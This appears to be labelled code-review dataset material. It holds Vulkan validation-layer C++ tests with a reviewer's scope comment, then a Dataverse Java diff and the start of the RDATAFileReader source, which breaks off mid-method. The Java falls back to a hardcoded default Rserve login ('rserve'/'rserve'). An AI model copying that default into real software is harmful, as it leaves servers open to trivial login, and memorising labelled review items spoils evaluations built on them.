create_info.pNext = nullptr; create_info.flags = 0; create_info.descriptorUpdateEntryCount = 1; create_info.pDescriptorUpdateEntries = &entries; auto do_test = [&](std::string err) { VkDescriptorUpdateTemplateKHR dut = VK_NULL_HANDLE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, err); if (VK_SUCCESS == vkCreateDescriptorUpdateTemplateKHR(m_device->handle(), &create_info, nullptr, &dut)) { vkDestroyDescriptorUpdateTemplateKHR(m_device->handle(), dut, nullptr); } m_errorMonitor->VerifyFound(); }; // Descriptor set type template create_info.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_DESCRIPTOR_SET; // descriptorSetLayout is NULL do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00350"); // Bad pipelineLayout handle, to be ignored if templatType is DESCRIPTOR_SET { create_info.pipelineLayout = reinterpret_cast<VkPipelineLayout &>(badhandle); create_info.descriptorSetLayout = ds_layout_ub.handle(); VkDescriptorUpdateTemplateKHR dut = VK_NULL_HANDLE; m_errorMonitor->ExpectSuccess(); if (VK_SUCCESS == vkCreateDescriptorUpdateTemplateKHR(m_device->handle(), &create_info, nullptr, &dut)) { vkDestroyDescriptorUpdateTemplateKHR(m_device->handle(), dut, nullptr); } m_errorMonitor->VerifyNotFound(); } create_info.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_PUSH_DESCRIPTORS_KHR; // Bad pipelineLayout handle do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00352"); create_info.pipelineBindPoint = VK_PIPELINE_BIND_POINT_COMPUTE; create_info.pipelineLayout = pipeline_layout.handle(); create_info.set = 2; // Bad bindpoint -- force fuzz the bind point memset(&create_info.pipelineBindPoint, 0xFE, sizeof(create_info.pipelineBindPoint)); do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00351"); create_info.pipelineBindPoint = VK_PIPELINE_BIND_POINT_COMPUTE; // Bad pipeline layout create_info.pipelineLayout = VK_NULL_HANDLE; do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00352"); create_info.pipelineLayout = pipeline_layout.handle(); // Wrong set # create_info.set = 0; do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00353"); // Invalid set # create_info.set = 42; do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00353"); // Bad descriptorSetLayout handle, to be ignored if templateType is PUSH_DESCRIPTORS { create_info.set = 2; create_info.descriptorSetLayout = reinterpret_cast<VkDescriptorSetLayout &>(badhandle); VkDescriptorUpdateTemplateKHR dut = VK_NULL_HANDLE; m_errorMonitor->ExpectSuccess(); if (VK_SUCCESS == vkCreateDescriptorUpdateTemplateKHR(m_device->handle(), &create_info, nullptr, &dut)) { vkDestroyDescriptorUpdateTemplateKHR(m_device->handle(), dut, nullptr); } m_errorMonitor->VerifyNotFound(); } // Bad descriptorSetLayout handle create_info.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_DESCRIPTOR_SET; do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00350"); } TEST_F(VkLayerTest, InlineUniformBlockEXT) { TEST_DESCRIPTION("Test VK_EXT_inline_uniform_block."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Did not find required instance extension %s; skipped.\n", kSkipPrefix, VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); std::array<const char *, 2> required_device_extensions = {VK_KHR_MAINTENANCE1_EXTENSION_NAME, 
VK_EXT_INLINE_UNIFORM_BLOCK_EXTENSION_NAME}; for (auto device_extension : required_device_extensions) { if (DeviceExtensionSupported(gpu(), nullptr, device_extension)) { m_device_extension_names.push_back(device_extension); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, device_extension); return; } } // Enable descriptor indexing if supported, but don't require it. bool supportsDescriptorIndexing = true; required_device_extensions = {VK_KHR_MAINTENANCE3_EXTENSION_NAME, VK_EXT_DESCRIPTOR_INDEXING_EXTENSION_NAME}; for (auto device_extension : required_device_extensions) { if (DeviceExtensionSupported(gpu(), nullptr, device_extension)) { m_device_extension_names.push_back(device_extension); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, device_extension); supportsDescriptorIndexing = false; return; } } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); auto descriptor_indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); void *pNext = supportsDescriptorIndexing ? &descriptor_indexing_features : nullptr; // Create a device that enables inline_uniform_block auto inline_uniform_block_features = lvl_init_struct<VkPhysicalDeviceInlineUniformBlockFeaturesEXT>(pNext); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&inline_uniform_block_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); PFN_vkGetPhysicalDeviceProperties2KHR vkGetPhysicalDeviceProperties2KHR = (PFN_vkGetPhysicalDeviceProperties2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceProperties2KHR"); assert(vkGetPhysicalDeviceProperties2KHR != nullptr); // Get the inline uniform block limits auto inline_uniform_props = lvl_init_struct<VkPhysicalDeviceInlineUniformBlockPropertiesEXT>(); auto prop2 = lvl_init_struct<VkPhysicalDeviceProperties2KHR>(&inline_uniform_props); vkGetPhysicalDeviceProperties2KHR(gpu(), &prop2); ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2)); VkDescriptorSetLayoutBinding dslb = {}; std::vector<VkDescriptorSetLayoutBinding> dslb_vec = {}; VkDescriptorSetLayoutCreateInfo ds_layout_ci = {}; ds_layout_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_CREATE_INFO; VkDescriptorSetLayout ds_layout = {}; // Test too many bindings dslb_vec.clear(); dslb.binding = 0; dslb.descriptorType = VK_DESCRIPTOR_TYPE_INLINE_UNIFORM_BLOCK_EXT; dslb.descriptorCount = 4; dslb.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; if (inline_uniform_props.maxInlineUniformBlockSize < dslb.descriptorCount) { printf("%sDescriptorCount exceeds InlineUniformBlockSize limit, skipping tests\n", kSkipPrefix); return; } uint32_t maxBlocks = std::max(inline_uniform_props.maxPerStageDescriptorInlineUniformBlocks, inline_uniform_props.maxDescriptorSetInlineUniformBlocks); for (uint32_t i = 0; i < 1 + maxBlocks; ++i) { dslb.binding = i; dslb_vec.push_back(dslb); } ds_layout_ci.bindingCount = dslb_vec.size(); ds_layout_ci.pBindings = dslb_vec.data(); VkResult err = vk::CreateDescriptorSetLayout(m_device->device(), &ds_layout_ci, NULL, &ds_layout); ASSERT_VK_SUCCESS(err); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-descriptorType-02214"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-descriptorType-02216"); 
m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-descriptorType-02215"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-descriptorType-02217"); VkPipelineLayoutCreateInfo pipeline_layout_ci = {}; pipeline_layout_ci.sType = VK_STRUCTURE_TYPE_PIPELINE_LAYOUT_CREATE_INFO; pipeline_layout_ci.pNext = NULL; pipeline_layout_ci.setLayoutCount = 1; pipeline_layout_ci.pSetLayouts = &ds_layout; VkPipelineLayout pipeline_layout = VK_NULL_HANDLE; err = vk::CreatePipelineLayout(m_device->device(), &pipeline_layout_ci, NULL, &pipeline_layout); m_errorMonitor->VerifyFound(); vk::DestroyPipelineLayout(m_device->device(), pipeline_layout, NULL); pipeline_layout = VK_NULL_HANDLE; vk::DestroyDescriptorSetLayout(m_device->device(), ds_layout, nullptr); ds_layout = VK_NULL_HANDLE; // Single binding that's too large and is not a multiple of 4 dslb.binding = 0; dslb.descriptorCount = inline_uniform_props.maxInlineUniformBlockSize + 1; ds_layout_ci.bindingCount = 1; ds_layout_ci.pBindings = &dslb; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutBinding-descriptorType-02209"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutBinding-descriptorType-02210"); err = vk::CreateDescriptorSetLayout(m_device->device(), &ds_layout_ci, NULL, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->device(), ds_layout, nullptr); ds_layout = VK_NULL_HANDLE; // Pool size must be a multiple of 4 VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_INLINE_UNIFORM_BLOCK_EXT; ds_type_count.descriptorCount = 33; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.flags = 0; ds_pool_ci.maxSets = 2; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool ds_pool = VK_NULL_HANDLE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorPoolSize-type-02218"); err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); m_errorMonitor->VerifyFound(); if (ds_pool) { vk::DestroyDescriptorPool(m_device->handle(), ds_pool, nullptr); ds_pool = VK_NULL_HANDLE; } // Create a valid pool ds_type_count.descriptorCount = 32; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); m_errorMonitor->VerifyNotFound(); // Create two valid sets with 8 bytes each dslb_vec.clear(); dslb.binding = 0; dslb.descriptorType = VK_DESCRIPTOR_TYPE_INLINE_UNIFORM_BLOCK_EXT; dslb.descriptorCount = 8; dslb.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; dslb_vec.push_back(dslb); dslb.binding = 1; dslb_vec.push_back(dslb); ds_layout_ci.bindingCount = dslb_vec.size(); ds_layout_ci.pBindings = &dslb_vec[0]; err = vk::CreateDescriptorSetLayout(m_device->device(), &ds_layout_ci, NULL, &ds_layout); m_errorMonitor->VerifyNotFound(); VkDescriptorSet descriptor_sets[2]; VkDescriptorSetLayout set_layouts[2] = {ds_layout, ds_layout}; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorSetCount = 2; alloc_info.descriptorPool = ds_pool; alloc_info.pSetLayouts = set_layouts; err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, descriptor_sets); m_errorMonitor->VerifyNotFound(); // Test invalid VkWriteDescriptorSet parameters (array element and size 
must be multiple of 4) VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_sets[0]; descriptor_write.dstBinding = 0; descriptor_write.dstArrayElement = 0; descriptor_write.descriptorCount = 3; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_INLINE_UNIFORM_BLOCK_EXT; uint32_t dummyData[8] = {}; VkWriteDescriptorSetInlineUniformBlockEXT write_inline_uniform = {}; write_inline_uniform.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET_INLINE_UNIFORM_BLOCK_EXT; write_inline_uniform.dataSize = 3; write_inline_uniform.pData = &dummyData[0]; descriptor_write.pNext = &write_inline_uniform; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-02220"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); descriptor_write.dstArrayElement = 1; descriptor_write.descriptorCount = 4; write_inline_uniform.dataSize = 4; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-02219"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); descriptor_write.pNext = nullptr; descriptor_write.dstArrayElement = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-02221"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); descriptor_write.pNext = &write_inline_uniform; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyNotFound(); // Test invalid VkCopyDescriptorSet parameters (array element and size must be multiple of 4) VkCopyDescriptorSet copy_ds_update = {}; copy_ds_update.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_ds_update.srcSet = descriptor_sets[0]; copy_ds_update.srcBinding = 0; copy_ds_update.srcArrayElement = 0; copy_ds_update.dstSet = descriptor_sets[1]; copy_ds_update.dstBinding = 0; copy_ds_update.dstArrayElement = 0; copy_ds_update.descriptorCount = 4; copy_ds_update.srcArrayElement = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkCopyDescriptorSet-srcBinding-02223"); vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); copy_ds_update.srcArrayElement = 0; copy_ds_update.dstArrayElement = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkCopyDescriptorSet-dstBinding-02224"); vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); copy_ds_update.dstArrayElement = 0; copy_ds_update.descriptorCount = 5; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkCopyDescriptorSet-srcBinding-02225"); vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); copy_ds_update.descriptorCount = 4; vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyNotFound(); vk::DestroyDescriptorPool(m_device->handle(), ds_pool, nullptr); vk::DestroyDescriptorSetLayout(m_device->device(), ds_layout, nullptr); } TEST_F(VkLayerTest, WrongdstArrayElement) { ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, 
nullptr}, }); VkImageObj image(m_device); image.Init(32, 32, 1, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); VkImageView view = image.targetView(VK_FORMAT_B8G8R8A8_UNORM); VkDescriptorImageInfo image_info = {}; image_info.imageView = view; image_info.sampler = VK_NULL_HANDLE; image_info.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; descriptor_set.image_infos.emplace_back(image_info); VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT; descriptor_write.pImageInfo = descriptor_set.image_infos.data(); descriptor_write.pBufferInfo = nullptr; descriptor_write.pTexelBufferView = nullptr; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); descriptor_write.dstArrayElement = 1; descriptor_set.descriptor_writes.emplace_back(descriptor_write); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); OneOffDescriptorSet descriptor_set2(m_device, { {0, VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT, 2, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); descriptor_set2.image_infos.emplace_back(image_info); descriptor_set2.image_infos.emplace_back(image_info); descriptor_write.dstSet = descriptor_set2.set_; descriptor_write.descriptorCount = 2; descriptor_write.pImageInfo = descriptor_set2.image_infos.data(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); descriptor_write.dstArrayElement = 1; descriptor_set2.descriptor_writes.emplace_back(descriptor_write); descriptor_set2.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); descriptor_write.dstArrayElement = 3; descriptor_set2.descriptor_writes.clear(); descriptor_set2.descriptor_writes.emplace_back(descriptor_write); descriptor_set2.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); }
1
12542
Can you tighten the scope of these variables by moving them? i.e. Move to ~4372?
KhronosGroup-Vulkan-ValidationLayers
cpp
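The review comment above asks for the descriptor-pool template variables (dp_size_template / dp_ci_template) to be declared closer to the sub-tests that use them. Below is a minimal, self-contained C++ sketch of that scope-tightening pattern only; the struct types are hypothetical stand-ins, not the real Vulkan API, so the example stays compilable without an SDK.

#include <cstdio>

// Hypothetical stand-ins for the Vulkan pool structs; they exist only to
// keep this sketch self-contained.
struct PoolSize { int type; int descriptorCount; };
struct PoolCreateInfo { int maxSets; const PoolSize *pPoolSizes; };

int main() {
    // Declared immediately above their only uses, instead of at the top of a
    // long test body, so lifetime and visibility match actual use.
    const PoolSize dp_size_template{0 /* type */, 1 /* descriptorCount */};
    const PoolCreateInfo dp_ci_template{1 /* maxSets */, &dp_size_template};

    // sub-test 1: invalid maxSets
    {
        PoolCreateInfo invalid_dp_ci = dp_ci_template;
        invalid_dp_ci.maxSets = 0;  // mutate only the local copy
        std::printf("maxSets sub-test uses maxSets=%d\n", invalid_dp_ci.maxSets);
    }

    // sub-test 2: invalid descriptorCount
    {
        PoolSize invalid_dp_size = dp_size_template;
        invalid_dp_size.descriptorCount = 0;  // mutate only the local copy
        PoolCreateInfo dp_ci = dp_ci_template;
        dp_ci.pPoolSizes = &invalid_dp_size;
        std::printf("descriptorCount sub-test uses descriptorCount=%d\n", dp_ci.pPoolSizes->descriptorCount);
    }
    return 0;
}

Whether the real test moves the declarations into each sub-block or just below the setup code is a style call for the author; the sketch only shows the narrower-scope shape the reviewer appears to be asking for.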
@@ -90,7 +90,7 @@ public class RDATAFileReader extends TabularDataFileReader {
     // RServe static variables
     private static String RSERVE_HOST = System.getProperty("dataverse.rserve.host");
     private static String RSERVE_USER = System.getProperty("dataverse.rserve.user");
-    private static String RSERVE_PASSWORD = System.getProperty("dataverse.rserve.pwrd");
+    private static String RSERVE_PASSWORD = System.getProperty("dataverse.rserve.password");
     private static int RSERVE_PORT;
     // TODO:
1
/* Copyright (C) 2005-2013, by the President and Fellows of Harvard College. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Dataverse Network - A web application to share, preserve and analyze research data. Developed at the Institute for Quantitative Social Science, Harvard University. Version 3.0. */ package edu.harvard.iq.dataverse.ingest.tabulardata.impl.plugins.rdata; import java.io.*; import java.io.FileReader; import java.io.InputStreamReader; import java.text.*; import java.util.logging.*; import java.util.*; import java.security.NoSuchAlgorithmException; import javax.inject.Inject; // Rosuda Wrappers and Methods for R-calls to Rserve import org.rosuda.REngine.REXP; import org.rosuda.REngine.REXPMismatchException; import org.rosuda.REngine.RList; import org.rosuda.REngine.Rserve.RFileInputStream; import org.rosuda.REngine.Rserve.RFileOutputStream; import org.rosuda.REngine.Rserve.*; import edu.harvard.iq.dataverse.DataTable; import edu.harvard.iq.dataverse.datavariable.DataVariable; import edu.harvard.iq.dataverse.datavariable.VariableCategory; import edu.harvard.iq.dataverse.ingest.plugin.spi.*; import edu.harvard.iq.dataverse.ingest.tabulardata.TabularDataFileReader; import edu.harvard.iq.dataverse.ingest.tabulardata.spi.TabularDataFileReaderSpi; import edu.harvard.iq.dataverse.ingest.tabulardata.TabularDataIngest; import edu.harvard.iq.dataverse.rserve.*; import javax.naming.Context; import javax.naming.InitialContext; import javax.naming.NamingException; import org.apache.commons.lang.RandomStringUtils; import org.apache.commons.lang.ArrayUtils; /** * Dataverse 4.0 implementation of <code>TabularDataFileReader</code> for the * RData Binary Format. * * Based on the original implementation for DVN v3.*, by Matt Owen (2012-2013), * completed by Leonid Andreev in 2013. * * This version is a serious re-write of the plugin, using the new 4.0 * ingest plugin architecture. * * original * @author Matthew Owen * @author Leonid Andreev * This implementation uses external R-Scripts to do the bulk of the processing. 
*/ public class RDATAFileReader extends TabularDataFileReader { // Date-time things public static final String[] FORMATS = { "other", "date", "date-time", "date-time-timezone" }; // R-ingest recognition files private static final String[] FORMAT_NAMES = { "RDATA", "Rdata", "rdata" }; private static final String[] EXTENSIONS = { "Rdata", "rdata" }; private static final String[] MIME_TYPE = { "application/x-rlang-transport" }; // R Scripts static private String RSCRIPT_CREATE_WORKSPACE = ""; static private String RSCRIPT_DATASET_INFO_SCRIPT = ""; static private String RSCRIPT_GET_DATASET = ""; static private String RSCRIPT_GET_LABELS = ""; static private String RSCRIPT_WRITE_DVN_TABLE = ""; // RServe static variables private static String RSERVE_HOST = System.getProperty("dataverse.rserve.host"); private static String RSERVE_USER = System.getProperty("dataverse.rserve.user"); private static String RSERVE_PASSWORD = System.getProperty("dataverse.rserve.pwrd"); private static int RSERVE_PORT; // TODO: // we're not using these time/data formats for anything, are we? // DATE FORMATS private static SimpleDateFormat[] DATE_FORMATS = new SimpleDateFormat[] { new SimpleDateFormat("yyyy-MM-dd") }; // TIME FORMATS private static SimpleDateFormat[] TIME_FORMATS = new SimpleDateFormat[] { // Date-time up to milliseconds with timezone, e.g. 2013-04-08 13:14:23.102 -0500 new SimpleDateFormat("yyyy-MM-dd HH:mm:ss.SSS z"), // Date-time up to milliseconds, e.g. 2013-04-08 13:14:23.102 new SimpleDateFormat("yyyy-MM-dd HH:mm:ss.SSS"), // Date-time up to seconds with timezone, e.g. 2013-04-08 13:14:23 -0500 new SimpleDateFormat("yyyy-MM-dd HH:mm:ss z"), // Date-time up to seconds and no timezone, e.g. 2013-04-08 13:14:23 new SimpleDateFormat("yyyy-MM-dd HH:mm:ss") }; // Logger private static final Logger LOG = Logger.getLogger(RDATAFileReader.class.getPackage().getName()); TabularDataIngest ingesteddata = new TabularDataIngest(); private DataTable dataTable = new DataTable(); // Process ID, used partially in the generation of temporary directories private String mPID; // Object containing all the informatin for an R-workspace (including // temporary directories on and off server) private RWorkspace mRWorkspace; // Number formatter NumberFormat doubleNumberFormatter = new DecimalFormat(); // Builds R Requests for an R-server private RRequestBuilder mRequestBuilder; /* * Initialize Static Variables * This is primarily to construct the R-Script */ static { /* * Set defaults fallbacks for class properties */ if (RSERVE_HOST == null) RSERVE_HOST = "localhost"; if (RSERVE_USER == null) RSERVE_USER = "rserve"; if (RSERVE_PASSWORD == null) RSERVE_PASSWORD = "rserve"; if (System.getProperty("dataverse.ingest.rserve.port") == null) RSERVE_PORT = 6311; else RSERVE_PORT = Integer.parseInt(System.getProperty("dataverse.rserve.port")); // Load R Scripts into memory, so that we can run them via R-serve RSCRIPT_WRITE_DVN_TABLE = readLocalResource("scripts/write.table.R"); RSCRIPT_GET_DATASET = readLocalResource("scripts/get.dataset.R"); RSCRIPT_CREATE_WORKSPACE = readLocalResource("scripts/create.workspace.R"); RSCRIPT_GET_LABELS = readLocalResource("scripts/get.labels.R"); RSCRIPT_DATASET_INFO_SCRIPT = readLocalResource("scripts/dataset.info.script.R"); LOG.finer("R SCRIPTS AS STRINGS --------------"); LOG.finer(RSCRIPT_WRITE_DVN_TABLE); LOG.finer(RSCRIPT_GET_DATASET); LOG.fine(RSCRIPT_CREATE_WORKSPACE); LOG.finer(RSCRIPT_GET_LABELS); LOG.finer(RSCRIPT_DATASET_INFO_SCRIPT); LOG.finer("END OF R SCRIPTS AS STRINGS -------"); } 
/* * TODO: * Switch to the implementation in iq.dataverse.rserve * -- L.A. 4.0 alpha 1 */ private class RWorkspace { public String mParent, mWeb, mDvn, mDsb; public File mDataFile, mCsvDataFile; public RRequest mRRequest; public BufferedInputStream mInStream; /** * */ public RWorkspace () { mParent = mWeb = mDvn = mDsb = ""; mDataFile = null; mCsvDataFile = null; mInStream = null; } /** * Create the Actual R Workspace */ public void create () { try { LOG.fine("RDATAFileReader: Creating R Workspace"); RRequestBuilder scriptBuilder = mRequestBuilder.script(RSCRIPT_CREATE_WORKSPACE); LOG.fine("got a sript request builder"); RRequest scriptRequest = scriptBuilder.build(); LOG.fine("script request built."); /* REXP result = mRequestBuilder .script(RSCRIPT_CREATE_WORKSPACE) .build() .eval(); */ REXP result = scriptRequest.eval(); LOG.fine("evaluated the script"); RList directoryNames = result.asList(); mParent = null; if (directoryNames != null) { if (directoryNames.at("parent") != null) { mParent = directoryNames.at("parent").asString(); } else { LOG.fine("WARNING: directoryNames at \"parent\" is null!"); if(directoryNames.isEmpty()) { LOG.fine("WARNING: directoryNames is empty!"); } else { Set<String> dirKeySet = directoryNames.keySet(); Iterator iter = dirKeySet.iterator(); String key; while (iter.hasNext()) { key = (String) iter.next(); LOG.fine("directoryNames list key: "+key); } } } } else { LOG.fine("WARNING: directoryNames is null!"); } LOG.fine(String.format("RDATAFileReader: Parent directory of R Workspace is %s", mParent)); LOG.fine("RDATAFileReader: Creating file handle"); mDataFile = new File(mParent, "data.Rdata"); } catch (Exception E) { LOG.warning("RDATAFileReader: Could not create R workspace"); mParent = mWeb = mDvn = mDsb = ""; } } /** * Destroy the Actual R Workspace */ public void destroy () { String destroyerScript = new StringBuilder("") .append(String.format("unlink(\"%s\", TRUE, TRUE)", mParent)) .toString(); try { LOG.fine("RDATAFileReader: Destroying R Workspace"); mRRequest = mRequestBuilder .script(destroyerScript) .build(); mRRequest.eval(); LOG.fine("RDATAFileReader: DESTROYED R Workspace"); } catch (Exception ex) { LOG.warning("RDATAFileReader: R Workspace was not destroyed"); LOG.fine(ex.getMessage()); } } /** * Create the Data File to Use for Analysis, etc. 
*/ public File dataFile (String target, String prefix, int size) { String fileName = String.format("DVN.dataframe.%s.Rdata", mPID); mDataFile = new File(mParent, fileName); RFileInputStream RInStream = null; OutputStream outStream = null; RRequest req = mRequestBuilder.build(); try { outStream = new BufferedOutputStream(new FileOutputStream(mDataFile)); RInStream = req.getRConnection().openFile(target); if (size < 1024*1024*500) { int bufferSize = size; byte [] outputBuffer = new byte[bufferSize]; RInStream.read(outputBuffer); outStream.write(outputBuffer, 0, size); } RInStream.close(); outStream.close(); return mDataFile; } catch (FileNotFoundException exc) { exc.printStackTrace(); LOG.warning("RDATAFileReader: FileNotFound exception occurred"); return mDataFile; } catch (IOException exc) { exc.printStackTrace(); LOG.warning("RDATAFileReader: IO exception occurred"); } // Close R input data stream if (RInStream != null) { try { RInStream.close(); } catch (IOException exc) { } } // Close output data stream if (outStream != null) { try { outStream.close(); } catch (IOException ex) { } } return mDataFile; } /** * Set the stream * @param inStream */ public void stream (BufferedInputStream inStream) { mInStream = inStream; } /** * Save the Rdata File Temporarily */ private File saveRdataFile () { LOG.fine("RDATAFileReader: Saving Rdata File from Input Stream"); if (mInStream == null) { LOG.fine("RDATAFileReader: No input stream was specified. Not writing file and returning NULL"); return null; } byte [] buffer = new byte [1024]; int bytesRead = 0; RFileOutputStream outStream = null; RConnection rServerConnection = null; try { LOG.fine("RDATAFileReader: Opening R connection"); rServerConnection = new RConnection(RSERVE_HOST, RSERVE_PORT); LOG.fine("RDATAFileReader: Logging into R connection"); rServerConnection.login(RSERVE_USER, RSERVE_PASSWORD); LOG.fine("RDATAFileReader: Attempting to create file"); outStream = rServerConnection.createFile(mDataFile.getAbsolutePath()); LOG.fine(String.format("RDATAFileReader: File created on server at %s", mDataFile.getAbsolutePath())); } catch (IOException ex) { LOG.warning("RDATAFileReader: Could not create file on R Server"); } catch (RserveException ex) { LOG.warning("RDATAFileReader: Could not connect to R Server"); } /* * Read stream and write to destination file */ try { // Read from local file and write to rserver 